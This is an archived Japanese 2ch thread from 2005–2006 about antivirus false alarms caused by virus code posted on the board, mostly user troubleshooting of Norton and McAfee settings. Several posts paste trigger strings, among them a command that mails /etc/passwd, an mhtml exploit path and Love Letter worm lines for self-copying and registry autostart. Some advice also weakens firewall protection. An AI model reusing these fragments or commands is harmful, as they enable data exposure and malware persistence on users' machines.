[過去ログ] ノートンがvbsウィルスのソースに誤反応3 (1002レス)
上下前次1-新
このスレッドは過去ログ倉庫に格納されています。
次スレ検索 歴削→次スレ 栞削→次スレ 過去ログメニュー
332: 2005/10/29(土) 11:43:26 ID:??? AAS
>>331ですが、解決できました。
「オプション」→「NortonAntiVirus」→「AutoProtect」にて、
「SmartScanを使ってファイルをスキャン」にチェックが入っていたのを「完全ファイルスキャン」に変更したら反応しました。
拡張子.txtがAutoProtectの対象になってなかったってことなんですね……。失礼しました。
333: 2005/10/31(月) 21:20:51 ID:??? AAS
反応しちゃった場合は放置しといても大丈夫なの?
334: 2005/11/01(火) 03:53:50 ID:??? AAS
勝手に修復したり隔離したりする設定になってると、困ることもある。特に2ch専用ブラウザ使ってる場合。
335: 2005/11/05(土) 23:27:57 ID:??? AAS
これか
cat /etc/passwd | mail nobody
336: 2005/11/06(日) 10:55:05 ID:??? AAS
何もノートンが誤反応しているわけではありません。
VBScriptやJavaScriptの拡張子のファイルに反応すべきなのを、
どの拡張子にでも誇大反応するだけです。
WindowsUpdateは、常に最新の状態に心がける事。
SunのJavaをインストールしている人は、これも最新版に更新しておく事。
RealPlayerやAdobe Readerなども最新にしておかないと、ウィルスに感染しますよ。
これらを心がけて最新状態にしてあれば、ウィルス反応があってもシステムにはもう感染はしません。
過去のWindowsのセキュリティホールを攻撃するアクティブスクリプトに反応しているだけですから、無視して結構です。
ページをプレビューしただけで反応するようなウィルスは、ほとんど全部がもはや検出する必要がないものです。
セキュリティベンダーなどに騙されてはいけませんよ。
337(1): 2005/11/13(日) 13:25:01 ID:??? AAS
cenの部屋の管理人さんへ、
誤反応スクリプト無効化ソフト vicptdel ですが、
VBS Freelink.Bにも対応してもらえないでしょうか?
またサイトトップには、updateの表示だけでなく、update日付やVerも
記載していただけたら嬉しいです。ご検討よろしくお願いします。
cenの部屋
外部リンク:www.geocities.jp
338(1): 2005/11/13(日) 13:39:48 ID:??? AAS
ラウンジ開いたらブラッドハウンドに感染したみたいなんですが解決法がいまいちよく解りません…
339: 2005/11/14(月) 11:37:29 ID:??? AAS
Vipのスレ一覧でも反応するっぽいけど誤検出なんだろねえ…
340: 2005/11/14(月) 16:31:14 ID:??? AAS
うん
341: 2005/11/17(木) 11:59:50 ID:??? AAS
Bloodhound.Exploit.6ってなんてコードで引っ掛かってるですか?
NGワード指定したいんで教えてください
342: 2005/11/17(木) 13:38:30 ID:??? AAS
専用ブラウザでNGワード指定しても2chの鯖から取得して保存されるデータは同じなので無意味。
Proxomitronとかでフィルタリングするなら別だが。
それより素直にノートンの除外設定すべき。
343(1): cen ◆Pm9xOTJuM. 2005/11/18(金) 00:43:33 ID:??? AAS
>>337
ご意見ありがとうです。
VBS.Freelink.Bですが、パターンは1つですが対応はしていますよ。
対応していないパターンかもしれないので、もしよかったら誤反応した
スレを教えて頂けないでしょうか。
そうですね。日付とバージョンはまた書いときますです。
344: 2005/11/20(日) 16:39:13 ID:??? AAS
ほう
345(1): 2005/11/20(日) 21:02:09 ID:??? AAS
>>343
Winny一般コミック part144
2chスレ:download
上記のレスです。
dat落ちしてますので、以下を参照してください。
外部リンク[html]:makimo.to
346: cen ◆Pm9xOTJuM. 2005/11/20(日) 22:07:13 ID:??? AAS
>>345
見てみました。そこの>>5からdatファイルを作って試しましたが、
無効化して、ウイルス対策ソフトでスキャンしても反応しませんでした
よ。
あと、このソフトで対応しているのは、2chにあるdatファイルのみです。
例:外部リンク[dat]:pc7.2ch.net
壺のdatやhtmlには対応していないです。
347: cen ◆Pm9xOTJuM. 2005/11/22(火) 02:12:37 ID:??? AAS
>>17 のソフトの紹介ページを更新しましたです。
外部リンク[html]:www.geocities.jp
348: 2005/11/25(金) 13:41:31 ID:73+tCVDU(1)調 AAS
ウィルスが検出されんだけどどうすりゃいいの?
349: 2005/11/25(金) 14:39:57 ID:??? AAS
恐れず全力で戦え
350: [age] 2005/11/25(金) 17:03:37 ID:??? AAS
保守
351(1): 2005/11/28(月) 08:08:31 ID:??? AAS
2chスレ:handygame
このスレを読み込もうとすると、ノートン先生が
206.223.150.115からのアタックを検出して
途中までしか読み込めなくなります。
手動スキャンとAuto-Protectでlogフォルダの
除外の設定はしたんだけどまだダメっぽい。
OSはWinXP, ノートン先生はNAV2003, 専ブラはLive2chです。
たっけてー。
352(3): 2005/11/28(月) 08:36:32 ID:??? AAS
<body onload=window()>
353(2): 2005/11/28(月) 08:42:51 ID:??? AAS
>>351
NAVですか? インターネットセキュリティじゃなくて?
スレみたら、Nortonスレで昨日話題になったonloadなんちゃらのトラップを確認しました。
これはフォルダの除外設定では対応できなかったと思います。
NIS使ってるなら、NISを無効にして再取得を。
>>352
あーバカが貼りやがったよorz
354(3): 2005/11/28(月) 08:54:07 ID:??? AAS
>>353
あ、NISでした。勘違いsorry。
無効→再取得してトラップっぽいレス(>>499と>>543)
2個あぼ〜んにしました。
これだけで問題ないですか?
355(2): 2005/11/28(月) 09:01:10 ID:??? AAS
>>354
あぼーんの意味はありません。一度取得すれば問題ありません。
ただし、新規に貼られたら、NGワードに指定してあぼーん(または透明あぼーん)しても引っかかります。
現状での対処法としては
○引っかかったときにNISを切って再取得をする対処療法
○侵入検知の設定で、AutoBlockの除外項目に2chの鯖を登録する(穴をあけることになるので微妙ですが)
くらいでしょうか。
Jane系なら、問題の文字列を別の文字列に置き換えればおk、という案もNortonスレで出てましたが
Live2chでそれをやるのはちょっと手間なようです。
Live2chのスレでも少し話題になってますので、そちらも追っておくことをお勧めします。
356: 2005/11/28(月) 10:58:13 ID:??? AAS
>>355
ご丁寧にどうもありがとうございます。
一度取得してしまえばそれでオワリなんですね。
Live2chのスレ探して見てみます。
357(1): 2005/11/28(月) 14:10:20 ID:??? AAS
>>355
>Jane系なら、問題の文字列を別の文字列に置き換えればおk、という案もNortonスレで出てましたが
誘導もしくは詳しくお願いします。
358(1): 2005/11/28(月) 14:42:24 ID:??? AAS
>>357
<ここ数日2chを騒がせている侵入検知トラップの対策法>
症状:
Norton Internet Securityを使用している人で、特定の文字列を書かれると侵入検知が多発し
最短30分間そのアドレスがNISにより規制されるためログが読めなくなる。
対策:上に行くほどおすすめ
@Jane系の専用ブラウザ使ってる場合
JaneフォルダにReplaceStr.txtというテキストファイルを作り
onload=[Tab]onload=
みたいに置き換えればOK(↑の”[Tab]”はタブ入力)
Tabキーを押すのを忘れて[Tab]onloadとそのまま書いてはダメ
AReplace法が使えない場合(他の専用ブラウザ、IEなど)
Nortonの統計ログの侵入検知の項目を見て、ブロックされているサーバ名を確認(例:tmp5.2ch.net)
侵入検知の設定で除外に上で確認したサーバ名を入れる
ただしこの方法は穴を作ることになるのであまりおすすめではない
Bよくわかんね、って人
読み書きするときに「Norton Internet Securityを無効にする」を選んで一時的にNISを切る。
このときAuto-Protectを切っても無意味なので注意。Auto-ProtectはAntivirusなので。
ガセビアの沼
・Love-letterと同じVB使った疑似ウイルスだからNAVの除外設定に専用ブラウザのログフォルダを入れてやればいい、というのはガセ
今回のはNAVではなくNIS管轄のトラップです
Nortonスレはこちら。
ただし、問題の起こる文字列が貼られているので、読み込むときには上記対策のいずれかを行ってください。
【ノートン】インターネットセキュリティ Ver.77【2006】
2chスレ:sec
359(1): [<body onload=window()>] 2005/11/28(月) 14:57:54 ID:??? AAS
(笑)
360: 2005/11/28(月) 17:12:55 ID:??? AAS
外部リンク[htm]:www.computerterrorism.com
外部リンク[htm]:www.computerterrorism.com
外部リンク[htm]:www.computerterrorism.com
361(1): 2005/11/28(月) 17:30:40 ID:??? AAS
>>358
それガセらしいじゃないか・・・
。゚(゚´Д`゚)゜。ウァァァン
362(1): 2005/11/28(月) 17:33:17 ID:??? AAS
>>361
あーはいはい。
1. [ファイアウォール]をダブルクリック
2. [ネットワーク]をクリック
3. [信頼]をクリック
4. [追加]をクリック
5. [範囲を使う]をチェック
6. 開始アドレスに「206.223.147.0」を入力、終了アドレスに「206.223.154.255」してOKをクリック
363: eip = eip + unescape("%u7030%u4300") ["<body onload=window();>"] 2005/11/28(月) 19:44:46 ID:??? AAS
外部リンク[htm]:www.computerterrorism.com
外部リンク[htm]:www.computerterrorism.com
外部リンク[htm]:www.computerterrorism.com
364: 2005/11/28(月) 20:55:42 ID:??? AAS
ms-its:mhtml:file://c:\
365: 名無しさん@お腹いぱーい。 NG NG AAS
とりあえずKnowledge Base 経由で>>352のソースをツマンテックに送って対応を催促しますた。
366(1): 2005/11/29(火) 00:54:38 ID:??? AAS
馬鹿だなノートン。
367(1): 2005/11/29(火) 10:34:17 ID:??? AAS
ノートンの誤作動対策したら、
スクリプトを仕組んでるスレみると、変に改行されてしまう(\r\n\r\n)のはなぜ?
368: 名無しさん@お腹いぱーい。 NG NG AAS
>>367
>>362の設定ですか?
2ちゃんねるブラウザでの不具合は
お使いの2ちゃんねるブラウザのスレで環境を詳しく書いてお聞きください。
369: cen ◆Pm9xOTJuM. 2005/11/30(水) 00:10:23 ID:??? AAS
>>352について、役に立つかは知らないですが、>>17のソフトにて
対応させてみました。
外部リンク[html]:www.geocities.jp
370: 2005/12/11(日) 18:48:05 ID:J4cBBOMR(1)調 AAS
【アメリカ】全米各地で中国系中心に「アジア人」生徒へのいじめが増加…問題の根深く
2chスレ:newsplus
371(3): 名無しさん@お腹いぱーい。 NG NG AAS
現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させるコードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの設定を見直さなければなりませんがあくまで暫定的処置です。
2chNIS問題まとめページ
外部リンク[html]:mickey.mirv.net
ノートン応急対策
外部リンク[php]:info.2ch.net
外部リンク:ansitu.xrea.jp 外部リンク:ansitu.xrea.jp
外部リンク:wiki.livedoor.jp
この場合2ちゃんねるに対してファイアーウォールの機能は働きません。
また、同様なコードが2ちゃんねるではない外部板に貼られていても上記ページのような設定はお勧めしません。
シマンテックの対応待ちです。
アンチウイルス(NAV)の設定は>>1
外部リンク:ansitu.xrea.jp
372: 2005/12/12(月) 23:03:17 ID:TJ/QcL4e(1)調 AAS
<body onload=windowあ()> ms-its:mhtml:fileあ外部リンク:c:\
↑ひらがな抜いて書き込みすると誤作動します。
誤作動うざい。
373: 2005/12/12(月) 23:14:43 ID:??? AAS
doredore,
<body onload=window()> ms-its:mhtml:file://c:\
374: 2005/12/13(火) 00:32:45 ID:??? AA×
375(1): NG NG AAS
てt
376(1): 2005/12/16(金) 07:08:09 ID:??? AAS
vicptdelで処理した後、久々にNAVでJaneのlogをスキャンしてみたら、
以下のレスがvicptdelで処理されていなかったらしく、NAVに削除されました。
2chスレ:download
外部リンク[html]:makimo.to
cenさんもしよろしければ、対応お願いします。
またスレタイがウィルスコードだったのか分かりませんが、subject.txtに
以下のUnix Penguinが入っていましたが、datだけでなく、
vicptdelでsubject.txt等も対応できないでしょうか?
caXt /etc/paXsswd | mail noXbody (Xを削除)
377: cen ◆Pm9xOTJuM. 2005/12/18(日) 00:49:25 ID:??? AAS
>>376
そのスレの11ですが、そのパターンは対応していますよ。
手で11のdatを作って、スキャンしたら無効化されました。
デフォルトだとスキャンする時から10日前以降に更新されたdat
ファイルのみスキャンする設定なので、すべてのdatファイルを
スキャンする設定でしてみてください。
あと、subject.txtは専用ブラウザで板を見るときに常に更新するもの
だと思いますので、無効化しても効果がないので、スキャンはしない
です。
378(2): 2005/12/22(木) 17:14:31 ID:Y2IitcnV(1)調 AAS
ノートンインターネット2006を入れたのですが、初心者の質問の板が
見れたり見れなかったりします。見れてもウィルス反応がでてしまう
のですが、2006の設定を教えて下さい。
お願いします。
379: 2005/12/22(木) 17:23:38 ID:??? AAS
>>378
ノートンを切る
それだけ
380(1): 2005/12/22(木) 19:21:21 ID:Z1b4rF6D(1)調 AAS
NIS2006を入れたんですが、誤反応しません。
設定が悪くセキュリティが甘くなってるのでしょうか?
381(1): 2005/12/22(木) 19:37:59 ID:??? AAS
>>380
割れてます。
382(1): [380] 2005/12/22(木) 20:22:37 ID:??? AAS
>>381
普通にLiveUpdateとかできるのに…いや、それより何故割れてるって解るんでしょうか?
383: 2005/12/22(木) 20:23:54 ID:??? AAS
>>382
(((((((( ;゚Д゚)))))))ガクガクブルブル
384: [age] 2005/12/23(金) 00:52:52 ID:??? AA×
385(2): 2005/12/26(月) 23:44:59 ID:JAAmlww2(1)調 AAS
2chスレ:kankon
このスレにアクセスしたらウイルスが検出されます。
どうしたらいいですか?
386: 2005/12/26(月) 23:46:05 ID:??? AAS
>>385
このスレを一通り読んでから質問しろよ情報乞食
387(1): 2005/12/26(月) 23:48:53 ID:??? AAS
>>385
何でそうやってすぐに聞こうとするの?
まともな日本語能力と社会的常識を持っていれば
ちょっと調べれば、ちょっと読めば解決するのに
388(2): 2005/12/26(月) 23:54:34 ID:TT8kYPqv(1)調 AAS
外部リンク[cgi]:210.150.222.13
の掲示板に貼られている空白?の画像はスパイウェアー
だと他の利用者が知らせてくれたのですが、
もしかしたらクリックしてしまったたかもしれません
スパイウェアーというのは感染するとどうなってしまうのでしょうか?
怖いので今日中に再フォーマットするつもりですが・・・
389(1): 2005/12/26(月) 23:58:53 ID:??? AAS
>>388
で、何故このスレで聞こうと思ったの?
390: 2005/12/26(月) 23:59:45 ID:??? AAS
自称PC初心者はスレタイも読めない日本語初心者…っと。
391: 2005/12/27(火) 00:04:42 ID:TZFt/HNg(1)調 AAS
>>389
あ、今、別のスレで教えてもらえました
すいませんm(__)m
392: 2005/12/27(火) 01:32:52 ID:??? AAS
>>388
踏んだ 踏んだ どうにもならへん
内部で呼び出しているサーバーがお休みのようだ
マカフィーさんも無反応
XP_SP2にとってはブラクラ以外の何物にもならない
393: [age] 2006/01/05(木) 11:05:53 ID:??? AAS
じいさんのためにage
394(2): 2006/01/09(月) 23:41:35 ID:??? AAS
バージョン 】 1.12
【 スキン 】 default
【 IE 】 6.0.2900.2180
【 Windows 】 Windows XP Home Edition (Service Pack 2)
【 不具合 】 生活板がどのスレッドも見れません。
【詳しい内容 】 ボードデータの更新をしても、スレッドの更新をしても、再インストールしても
見れません。ちなみに専用ブラウザを使用しなくても見れなくなってしまいました。
何が原因なのでしょうか…?
395: [age] 2006/01/10(火) 21:00:00 ID:??? AAS
>>394
ここに来たってことはノートン入れてるんでしょ?
原因はノートン
ついでに保守age
396: 2006/01/11(水) 08:57:15 ID:??? AAS
ms-its:mhtml:file://c:\
397: [sega] 2006/01/15(日) 20:20:52 ID:??? AAS
定期age
398(2): 2006/01/22(日) 05:06:59 ID:??? AAS
すみません。色々やったけどギブですorz質問よろしいでしょうか…
■janeDoeα 0.1.12.2■xp■NIS2004■>>1-9は読みました
>>51>>56さんとややケースが似てるんですが…
最近ノートン2004を再インスコしたので、前と同じ方法(>>1)で
また専ブラのlogフォルダを除外設定しました、が、何故か今度はどう設定やり直しても
下記のスレで先生に怒られます。
2chスレ:pcqa(このスレです…)
2chスレ:hp
警告メッセージのスクショ↓
画像リンク
(このスレのです。これが2回でます)
画像リンク
(下のスレのです)
で、何度設定しても駄目だったのでこのソフトを入れて、トラップの無効化を試みたんですけど
外部リンク[html]:www.geocities.jp
やっぱり上記のスレで先生に怒られます。何回かこのソフト起動させてみたんですが
無効化成功してるよ。みたいなメッセージが出るだけで、依然として先生は怒りまくりだし
もうどうしていいか分かりません。誰か助けて〜(つД`;)
399(1): 2006/01/22(日) 05:20:54 ID:qJbbwLqx(1)調 AAS
トラックバック:2chスレ:qa
400: ぼるじょあ ◆yBEncckFOU 2006/01/22(日) 05:37:48 ID:??? AAS
>>398
(・3・) エェー そのソフトはdatは対策できるけど、subject.txtは
対策できないYO
401(1): 名無しさん@お腹いぱーい。 2006/01/22(日) 19:21:57 ID:??? AAS
>>398
今一度、Norton Anti Virusのオプションで
手動スキャンとAuto-Protectでlogフォルダの除外の指定をしているか確認してください。
該当スレに書き込んだ・該当スレをお気に入りに入れた・ウイルスコードを検索したりすると
幾つか除外の指定を増やすことになるのでご注意ください。
Janeの場合
Jane2ch\Logs
Jane2ch\favorites.dat
Jane2ch\kakikomi.txt
Jane2ch\SearchHistory.txt
ε三(; ・∀・)鯖マデオツカイの場合
otsukai\result.dat
詳しくはお使いの2ちゃんねるブラウザのスレのテンプレや
2ちゃんねるブラウザのヘルプ
2ちゃんねるブラウザ配布サイト等のFAQなどを参照してください。
402(1): 名無しさん@お腹いぱーい。 2006/01/22(日) 19:46:59 ID:??? AAS
>>401補足
増えた項目の内、
Jane2ch\favorites.dat
Jane2ch\kakikomi.txt
otsukai\result.dat
↑はスレタイに反応した場合です。
403(1): 2006/01/27(金) 17:56:55 ID:SL6Rf0+0(1)調 AAS
Live2chのフォルダごとNorton Anti Virus→除外に設定しても良いの?
404(1): 2006/01/28(土) 02:19:43 ID:W65BflbM(1)調 AAS
すみません、質問です。
昨日から携帯PHS板を見ていると、ノートンで何度も警告が出て、
WScript.KakWormってやつなんですけど、これは
「kak.hta';ken=wd+'START」ってスレタイがあるせいなのでしょうか?
405(1): 404 2006/01/28(土) 02:27:13 ID:??? AAS
すみません、テンプレ見ましたm(_ _)m
406(1): 名無しさん@お腹いぱーい。 2006/01/28(土) 20:16:04 ID:??? AAS
>>403
Logフォルダを除外に指定してね。
407(1): 2006/01/31(火) 10:00:47 ID:nkcqfLth(1/4)調 AAS
先程、他のスレッド見ていたら、ノートンの低危険度の表示が出てきて遮断をクリックしたら、あらゆるホームページが見れなくなりました。原因解るかた教えてください。宜しくお願いします。m(__)m
408(2): 2006/01/31(火) 10:02:30 ID:??? AAS
>>407
誘導されたらそう書け
それと普通>>1から読むもんだ
既知の質問を延々と繰り返し答えさせられるこっちの身にもなれ
409: [cat /etc/passwd | mail nobody] 2006/01/31(火) 10:03:47 ID:??? AAS
これかな?
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!外部リンク[htm]:www.loadcash.biz" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
End Sub
<body onload=window()>
410(3): 2006/01/31(火) 10:08:09 ID:nkcqfLth(2/4)調 AAS
>>408
はぁ?おめーから何も答えてもらってねーぞ。
解らねーんだったらいちいち出てくんじゃねぇよアフォ
411(1): 2006/01/31(火) 10:10:37 ID:??? AAS
言っておくけど、回答者はどこも共通だから
412: 2006/01/31(火) 10:11:13 ID:??? AA×
413: 2006/01/31(火) 10:12:28 ID:??? AAS
>>410
お前が礼言ってたコテな、テンプレに注意書きがあるくらいの要注意人物なんだよ
414: 2006/01/31(火) 10:16:03 ID:??? AAS
>>410
外部リンク:ansitu.xrea.jp
ここを読んでください
415(1): 2006/01/31(火) 10:16:50 ID:??? AAS
>>410
この部分ね
2005年11月28日現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させる
コードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの
設定を見直さなければなりませんがあくまで暫定的処置です。
NIS2005の場合(多分NIS2006も同じ)
416(1): 2006/01/31(火) 10:16:58 ID:nkcqfLth(3/4)調 AAS
>>411
解りました。m(__)mではどこで聞いても答えは一緒って事ですね。お手数おかけしました。また何かありましたら宜しくお願いします。
417: VIP@命 ◆VIPPER/vT. 2006/01/31(火) 10:31:48 ID:nkcqfLth(4/4)調 AAS
あっ。ちなみにぼくは、愛新ではありません。
あしからず
418(2): 2006/02/01(水) 13:48:25 ID:S10H/e1R(1/2)調 AAS
時々ノートンインターネットセキュリティ2004を使用している際、
スレ、もしくは板そのものがサーバーに接続できなくて見ることができません。
アンチウィルスは常時つけていますが、切ってもつけていても見ることができるのですが
この症状はアンチウィルスが反応している訳ではありません
インターネットセキュリティをつけているときだけ見ることができないのですが
なぜなんでしょうか?
もちろんインターネットセキュリティの2CHに書き込める為の設定をしてあります。
これはなぜなんでしょうか?
419(1): 2006/02/01(水) 13:55:37 ID:??? AAS
>>418
>>371の問題でもないってことでしょうか。
371の暫定対処をした場合はどうなりますか?
420: 418 2006/02/01(水) 14:05:32 ID:S10H/e1R(2/2)調 AAS
>>419
ありがとうごぜーます。
呼んできます。
421(4): 2006/02/02(木) 16:52:23 ID:KtbG8KDn(1/2)調 AAS
■>>1-9を読みましたか? 『YES』
マカフィーを使っているのですがdatファイルの入ったzipファイルを解凍しようと
すると「Exploit-mhtresir.gen」が発見されたので削除しますと言われzipファイルの中のdatを
他の場所に保存することもdatファイルを使うことも出来ないのですがどうすれば
zipファイルを解凍して中のdatファイルを使えるようになりますか?
OSはXP
アンチウイルスソフトはManaged virusScan plas AntiSpywareです。
お願いします。
422(1): 2006/02/02(木) 17:55:04 ID:KtbG8KDn(2/2)調 AAS
他できいてみます。
423(3): 名無しさん@お腹いぱーい。 NG NG AAS
>>421-422
> マカフィーを使っている
> datファイルの入ったzipファイル
2ちゃんねるブラウザのログファイルでは無い場合はこちらのスレでは扱っていません。
このスレでは「ノートントラップ」は2ちゃんねる(掲示板)にウイルスコードが貼り付けられ
Webブラウザや2ちゃんねるブラウザのログでノートンが誤反応することを指しています。
2chスレ:pcqa
そのzipファイルがアップローダーで拾ったものならマカフィーは正常な反応を示しているかと思います。
念のためにオンラインスキャンしてみてください。
外部リンク[asp]:www.trendmicro.co.jp
マカフィーについて以降はより詳しいあなたの環境(zipファイルの出所・何のアプリケーションに使われているのか等)を書いて
以下のスレにここから誘導されたことも併記してお尋ねください。
がんばれマカフィー Part.23 / ガンバレMcAfee
2chスレ:sec
もしマカフィーが2ちゃんねるブラウザのログで反応しているのならお手数ですがもう一度こちらに来てください。
424(1): 2006/02/03(金) 09:31:43 ID:ZZST2Rw7(1/3)調 AAS
>>423
ご丁寧に解答を頂きありがとうございます。
datファイルの入ったzipファイルはある2ちゃんねるのスレのまとめサイト
からダウンロードしたファイルです。
オンラインスキャンでは何も見つからなかったです。
>もしマカフィーが2ちゃんねるブラウザのログで反応しているのなら
>お手数ですがもう一度こちらに来てください
datファイルは2ちゃんねるのスレッドのdatファイルなのですが
こちらでよろしいでしょうか?お願いします。
425(1): 421 2006/02/03(金) 10:12:08 ID:ZZST2Rw7(2/3)調 AAS
すいません>>421の者です。
426(1): 名無しさん@お腹いぱーい。 NG NG AAS
>>424-425
おそらくそれはウイルスコードにマカフィーが誤反応しているものだと思われます。
他で教えていただいたのですがマカフィーにはノートンのようなウイルススキャンでフォルダ・ファイルの除外項目が無いそうです。
以下、現在の状況での対処方法です。
2ちゃんねるブラウザのJane派生のJaneViewでWickedStr.txtに手動で反応する文字列の一部を追記する。
誤反応スクリプト無効化ソフト外部リンク[html]:www.geocities.jpのアップデートを待って(現在マカフィートラップには対応していません)
ActiveShieldを無効→対象スレを取得→「誤反応スクリプト無効化ソフト」を使ってウイルスコードを無効→ActiveShield有効
2ちゃんねるブラウザMonoViewのアップデートを待って(現在マカフィートラップには対応していません)読み込む。
一番いい方法はマカフィーに該当するdatファイルを送って対策を促すことだと思います。
マカフィーユーザーで既に対処の仕方を知っている方がいらっしゃるのかもしれませんので
>>423のマカフィーのスレでこちらのことを聞いてみていただけませんでしょうか。
対処方法がありましたらこちらのスレにもお知らせいただけると幸いです。
また参考のためにも今後もこちらに来ていただけると助かります。
ノートントラップとマカフィートラップのウイルスコードは違うようなので
ノートンでは反応しないでマカフィーが誤反応したりまたその逆もあります。
長々としましたがマカフィートラップについての決定打が見当たらないので手探りのレスを御許しください。
参考にマカフィートラップと思われるやり取りの過去ログです。
2chスレ:sec
外部リンク[html]:makimo.to:8000
2chスレ:saku
したらばスレ:computer_10301
427: 421 2006/02/03(金) 14:40:06 ID:ZZST2Rw7(3/3)調 AAS
>>426
わかりやすく説明していただき、
関連スレまで貼っていただいてありがとうございます。
ただ解決まではいけなかったので>>423の方で聞かせて頂きます。
何かわかりましたらこちらにも報告させて頂きますね。
ありがとうございました。
428(2): 2006/02/06(月) 19:42:50 ID:??? AAS
なんかjaneでこのスレ読むとレス番がずれまくりなんですけど
これ直す方法はないんでしょうか…?何度再読み込みしても
421さんが406さんになっちゃいます…↓
> 406 名前:421[] 投稿日:2006/02/03(金) 14:40:06 ID:ZZST2Rw7
logフォルダの除外設定はしてあるので、先生も怒ってないんですが…
ノートン2004でxp。専ブラはjaneDoeView α051128です
429: 2006/02/07(火) 00:57:31 ID:3ZNXNyQs(1)調 AAS
XPに最初から入ってるノートンをアンインスコしたらもう再インスコって出来ませんかね??
430(2): 名無しさん@お腹いぱーい。 NG NG AAS
>>428
一旦ログを破棄してから読み込みでどうですか。
それと>>371にもありますがNIS(NPF)のファイアーウォールを誤作動させるコードもあるので
以下の設定もしてみてください。
現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させるコードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの設定を見直さなければなりませんがあくまで暫定的処置です。
2chNIS問題まとめページ
外部リンク[html]:mickey.mirv.net
ノートン応急対策
外部リンク[php]:info.2ch.net
外部リンク:ansitu.xrea.jp 外部リンク:ansitu.xrea.jp
外部リンク:wiki.livedoor.jp
この場合2ちゃんねるに対してファイアーウォールの機能は働きません。
また、同様なコードが2ちゃんねるではない外部板に貼られていても上記ページのような設定はお勧めしません。
シマンテックの対応待ちです。
アンチウイルス(NAV)の設定は>>1
外部リンク:ansitu.xrea.jp
431: 428 2006/02/07(火) 06:33:12 ID:??? AAS
>>430
丁寧なレスありがとうございました。火壁の設定してログ捨ててみたら
ズレてるの直りました!感謝です!
432(1): 421 2006/02/07(火) 09:35:42 ID:mnvRCCNZ(1)調 AAS
以前こちらで質問させて頂いて誘導された者です。
解決方法がわかりましたのでその報告をさせて頂きます。
結論からいうとマカフィーが起動している時にzipファイルの中からdatファイルを
出す方法はありませんでした。
ただマカフィーの自動スキャンを一時的に止めてその間にzipファイルの中の
datファイルを取り出すことができました。
一時的に自動スキャンを止める方法は(以下コピペ)
外部リンク[asp]:www.mcafee.com
>また、管理者権限でコンピュータにログオンし、[Ctrl]キーと[Shift]キーを押しながら
>タスクトレイのアイコンを右クリックすると、更に隠しメニューが表示されます。
>この隠しメニューから通常のメニューに加えて以下の操作を行うことができます。
>・隔離アイテムの一覧
>・VShieldを無効にする/VShieldを有効にする
>・終了
とのことでした。実際に試したところ成功いたしました。
またvbsウイルスソースが多々隔離されており消したところかなり早くなりました。
丁寧に教えてくれた皆さん、ありがとうございました。
433(2): 2006/02/08(水) 17:28:05 ID:??? AAS
>>430
>この場合2ちゃんねるに対してファイアーウォールの機能は働きません。
ということですが、それはセキュリティ的には問題ないレベルなんですか?
あと↓によると
2chNIS問題まとめページ
外部リンク[html]:mickey.mirv.net
>以下の対処方法では除外するIPアドレスの範囲からの攻撃に対してNISは反応しなくなります。
とありますが、2ちゃん以外の場所で除外したIPアドレスを利用した
悪意ある攻撃があった場合は大丈夫なんでしょうか?
それとも除外したIPアドレスは2ちゃん以外では使われてないのでしょうか?
分かる方いらっしゃったらご教授お願いします
434(1): 名無しさん@お腹いぱーい。 NG NG AAS
>>432
お知らせありがとうございます。
マカフィーについての解説を参照できますので助かりました。
>>433
> 2ちゃん以外の場所で除外したIPアドレスを利用した
> 悪意ある攻撃があった場合は大丈夫なんでしょうか?
2ちゃんねる以外のIPアドレスを除外することはここではお勧めしません。
また、2ちゃんねるからの攻撃・進入等はいままではありませんでした。
過去には踏み台pcを規制するための2ちゃんねるからのインバウンド TCP 接続信号を受け入れなければいけなかったこともあります。
2chスレ:sec の7
只、何事も絶対安全ということはないのでセキュ板本スレを見るようにしてください。
なにかあったら祭りになりますので。
【ノートン】インターネットセキュリティ Ver.82【2006】
2chスレ:sec
> それとも除外したIPアドレスは2ちゃん以外では使われてないのでしょうか?
おそらくないはずですが、2ちゃんねるのIPアドレスそのものに関しては
以下のスレに誘導されたことを明記してお聞きください。
質問・雑談スレ215@運用情報板
2chスレ:operate
関連スレ
ノートン誤作動対策本部
2chスレ:operate
435: 433 2006/02/08(水) 23:50:59 ID:??? AAS
>>434
お答え頂いてありがとうございました
紹介して頂いたスレはお気に入りに登録しました
あと運用情報板に質問して、疑問も解消しました
ありがとうございました
436: 2006/02/18(土) 20:12:50 ID:??? AAS
ここできいていいのかあれだけど、
updateして再起動してからjane開いて更新しようとすると
中危険度の小窓がいちいち表示されるようになった
「jane.exeがインターネットにアクセスしようとしています」
security無効にすると更新できるけど、前は有効のままで更新できてたの・・
解除方法おしえてくださいm(_ _)m
437: 2006/02/18(土) 20:37:00 ID:??? AAS
FWが反応してるだけみたいだね。
アプリ登録するだけじゃないのかな。
まあ、ノートン使ってないんでFWの一般論だけど。
438(2): 2006/02/24(金) 07:54:27 ID:/hbjD2Uq(1/2)調 AAS
2chブラウザのログ保存フォルダを「除外」に設定して、2ちゃんのスレで
ウイルス踏んじゃったらどうなるんですか?ノートンは守ってくれないんですか?
439(1): 2006/02/24(金) 09:20:24 ID:??? AAS
そんなノートンは窓から捨てろwwwwwwwwwww
440(1): 2006/02/24(金) 14:13:12 ID:??? AAS
>>438
2chブラウザのログ保存フォルダにウィルスが入り込むことはありません。
